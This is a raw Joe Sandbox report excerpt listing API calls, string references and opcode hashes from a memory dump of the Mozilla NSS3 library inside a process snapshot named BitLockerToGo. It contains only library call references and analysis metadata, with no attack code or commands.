                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C6B6E7D
                                                                                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C6B6EAA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3163584228-3076721864
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 75e7a8763a9f18bdf21bec9fdff5274dd3607952d25f2b190c2ed52517972ef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0a04a283c80b6fd331c0b88496dea73412ae13b4c6a5476711c3b9126d8aeb9b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75e7a8763a9f18bdf21bec9fdff5274dd3607952d25f2b190c2ed52517972ef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4631C572618612EFDB185E34DD08396BBA4AB0531AF14063CE59AE6A41E730F467CB85
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C6D2AE9,00000000,0000065C), ref: 6C6EA91D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C6D2AE9,00000000,0000065C), ref: 6C6EA934
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C6D2AE9,00000000,0000065C), ref: 6C6EA949
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,0000065C), ref: 6C6EA952
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID: *ml
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595327144-2329082585
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bc7946e462ad388b4bc63da8f6ddf541b78d5747c18514322ae4f52bf051f25
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 76e181ae93b558087adb34d772377a6db6f1cc4d015fed1e0345c019cb6bac32
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc7946e462ad388b4bc63da8f6ddf541b78d5747c18514322ae4f52bf051f25
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F33128B46062019FDB04CF19D980E62BBF8FF4D319B1581A9E8098F756E730E801CBA5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C5E7915,?,?), ref: 6C71A86D
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C5E7915,?,?), ref: 6C71A8A6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C71A8A0
                                                                                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C71A89B
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C71A891
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6e1ea8a9904ab5ad029d8c0b5516c514f9283a8985b8675854325f6079956088
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1170c26396d2b8a540d990685dd610e3ce3d90771d48997f2596b1a58165ccff
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e1ea8a9904ab5ad029d8c0b5516c514f9283a8985b8675854325f6079956088
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2110671B04204AFDB058F16DE41A6AB7A5FF89324F044038FC194BE41EB34A95ACB91
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C630BDE), ref: 6C630DCB
                                                                                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C630BDE), ref: 6C630DEA
                                                                                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C630BDE), ref: 6C630DFC
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C630BDE), ref: 6C630E32
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C630E2D
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 914cb4f4c34acd4801c1abadf6ac7d8bc35bd1bfdf88eb1f75431ff40efd9e25
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47dd2fd5c15e03b0387e240fb3c15428c0c2d064e224a3980383b4ec106d4d0a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 914cb4f4c34acd4801c1abadf6ac7d8bc35bd1bfdf88eb1f75431ff40efd9e25
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A60124727002249FE7208F25DC49E17B3ECDB45B09B05543DE909D3A81EB61EC1987E1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]ml,00000000,?,?,6C6C6AC6,?), ref: 6C6EAC2D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]ml,00000000,?,?,6C6C6AC6,?), ref: 6C6EAC44
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]ml,00000000,?,?,6C6C6AC6,?), ref: 6C6EAC59
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C6C6AC6,?,?,?,?,?,?,?,?,?,?,6C6D5D40,00000000,?,6C6DAAD4), ref: 6C6EAC62
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID: @]ml
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595327144-1248002651
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ecd3fb5c0e500c1d0768336a95c1dc3d0b1c670bf64401c9c017a64c248333bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 41af555ad1440a9afe6e3ec5cd91fc1d1a000c66b7212c64e49f6a9bd228df7d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecd3fb5c0e500c1d0768336a95c1dc3d0b1c670bf64401c9c017a64c248333bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71017CB56012009BDB00CF15E8C0B56BBB8AB49B19F1880A9E9498F746D734E809CBA9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5C1360,00000000), ref: 6C5C2A19
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C5C1360,00000000), ref: 6C5C2A45
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C5C2A7C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C2D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BD5F5530,?,?,00000000,?,6C5C296E), ref: 6C5C2DA4
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5C2AF3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C5C1360,00000000), ref: 6C5C2B71
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C5C2B90
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpystrlen$memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 638109778-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C5D9CF2
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9D45
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C5D9D8B
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9DDE
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDE1B
                                                                                                                                                                                                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C6EDE77
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2700453212-0
APIs
• TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C65CA21
• EnterCriticalSection.KERNEL32(0000001C), ref: 6C65CA35
• PR_Unlock.NSS3(00000000), ref: 6C65CA66
• PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C65CA77
• PR_Unlock.NSS3(00000000), ref: 6C65CAFC
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Similarity
• API ID: Unlock$CriticalEnterErrorSectionValue
• String ID:
• API String ID: 1974170392-0
APIs
• TlsGetValue.KERNEL32 ref: 6C63EDFD
• calloc.MOZGLUE(00000001,00000000), ref: 6C63EE64
• PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C63EECC
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C63EEEB
• free.MOZGLUE(?), ref: 6C63EEF6
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
Similarity
• API ID: ErrorValuecallocfreememcpy
• String ID:
• API String ID: 3833505462-0
APIs
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E0B
• DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C641E24
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C641E3B
• PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C641E8A
• PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C641EAD
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
Similarity
• API ID: Error$Choice_DecodeTimeUtil
• String ID:
• API String ID: 1529734605-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6C643FFF,00000000,?,?,?,?,?,6C641A1C,00000000,00000000), ref: 6C64ADA7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C643FFF,00000000,?,?,?,?,?,6C641A1C,00000000,00000000), ref: 6C64ADB4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C643FFF,?,?,?,?,6C643FFF,00000000,?,?,?,?,?,6C641A1C,00000000), ref: 6C64ADD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C698D2D,?,00000000,?), ref: 6C69FB85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C69FBB1
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7694B0,?,?,?,?,?,?,?,?,6C643FFF,00000000,?), ref: 6C64ADEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C643FFF), ref: 6C64AE3C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1d9905ddde8c084e98975fe30ce0e0fbaef812d38d6290d876c5d3db6b076e90
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 63767e362e16aec42960a2e1214e3b83273b588448a8ad24625c308459532337
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d9905ddde8c084e98975fe30ce0e0fbaef812d38d6290d876c5d3db6b076e90
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46112971E002156BE7109B659C40FBF77E8DF9624CF04C139FC2596642FB20E95A82AA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C6A085A,00000000,?,6C648369,?), ref: 6C698821
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C69883D
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698856
                                                                                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C698887
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C6A085A,00000000,?,6C648369,?), ref: 6C698899
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2759447159-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b1b95a98c275ebcb7b6acff5dbaaa2ac5a14a7233d725155cdb136530e1dad6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 99500369d62ae1adad033c30cfd17ebc3baee1e795b626a381948ece146aaaa6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b1b95a98c275ebcb7b6acff5dbaaa2ac5a14a7233d725155cdb136530e1dad6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 102151B4A04606CFDB00AF78C5841AABBF4FF0A349F114666DC98D7751EB30D495CBA6
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C6580DD), ref: 6C6628BA
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C6580DD), ref: 6C6628D3
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C6580DD), ref: 6C6628E8
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C6580DD), ref: 6C66290E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,6C6580DD), ref: 6C66291A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659270: DeleteCriticalSection.KERNEL32(?,?,6C665089,?,6C663B70,?,?,?,?,?,6C665089,6C65F39B,00000000), ref: 6C65927F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659270: free.MOZGLUE(?,?,6C663B70,?,?,?,?,?,6C665089,6C65F39B,00000000), ref: 6C659286
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659270: PL_HashTableDestroy.NSS3(?,6C663B70,?,?,?,?,?,6C665089,6C65F39B,00000000), ref: 6C659292
